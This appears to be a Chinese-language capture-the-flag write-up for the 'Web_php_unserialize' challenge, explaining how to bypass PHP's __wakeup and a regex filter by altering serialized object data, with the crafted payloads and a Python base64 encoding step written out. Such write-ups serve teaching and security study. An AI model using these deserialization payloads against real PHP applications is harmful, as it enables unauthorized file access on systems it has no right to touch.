攻防世界:Web_php_unserialize

攻防世界:Web_php_unserialize

本文知识点:

  1. php魔术方法(__wakeup)的绕过。 魔术方法 __wakeup() 是当php函数调用unserialize函数的时候自动调用的。但是当序列化后的属性的数量超过实际的数量 的时候,在特定的php版本是可以绕过__wakeup()方法的调用的。

    • 具体受影响的版本是**:PHP 5<5.6.25; PHP 7<7.0.10**

    一个简单的例子:

    php 复制代码
    <?php
    class Demo { 
        private $file = 'index.php';
        public function __construct($file) { 
            $this->file = $file; 
        }
    }
    ?>

    将上述代码序列化后的数据是: O:4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

    将其改为:O:4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}便能够绕过魔术方法__wakeup的调用。

  2. 序列化数据显示:
    public 属性序列化的时候格式是正常成员名
    private 属性序列化的时候格式是\0类名\0成员名 : 比如"\0Demo\0file"
    protect 属性序列化的时候格式是\0*\0 成员名 :比如"\0*\0file"

  3. 正则表达式中,属性数量的绕过,可以将数字前面添加正号(如:+4)进行绕过

解题思路

对象的序列化:

php 复制代码
<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
}
$a = new Demo("fl4g.php");
$b = serialize($a);
var_dump($b);
?>

上述代码的打印结果如下(注意\0的显示):

  1. 绕过正则表达式检查, 将4变为+4即可:

    O:+4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

  2. __wakeup方法的绕过,就是将类的属性的数量增加(只要大于原始的数量1即可):

    O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

    O:+4:"Demo":3:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

  3. 序列化数据,这里我使用的是python的方法,根据个人习惯即可,网上的题解一般使用的是php方法:

    python 复制代码
    import base64
    
    s = 'O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}'
    print(base64.encodebytes(s.encode()).decode())

    输出的结果为: TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

  4. 将其通过变量var传递到服务端即可:

拿到结果:

相关推荐
子兮曰几秒前
深入浏览器指纹:Canvas、WebGL、Audio是如何暴露你的身份的?
前端·浏览器·canvas
月亮补丁2 分钟前
AntiGravity只能生成 1:1 图片?一招破解尺寸限制
前端
何中应6 分钟前
MindMap部署
前端·node.js
NAGNIP9 分钟前
程序员效率翻倍的快捷键大全!
前端·后端·程序员
wxin_VXbishe9 分钟前
C#(asp.net)学员竞赛信息管理系统-计算机毕业设计源码28790
java·vue.js·spring boot·spring·django·c#·php
一个网络学徒12 分钟前
python5
java·服务器·前端
tiantian_cool13 分钟前
Claude Opus 4.6 模型新特性(2026年2月5日发布)
前端
0思必得018 分钟前
[Web自动化] Selenium获取元素的子元素
前端·爬虫·selenium·自动化·web自动化
用户57573033462424 分钟前
🌟 从一行 HTML 到屏幕像素:浏览器是如何“画”出网页的?
前端
NEXT0627 分钟前
React Hooks 进阶:useState与useEffect的深度理解
前端·javascript·react.js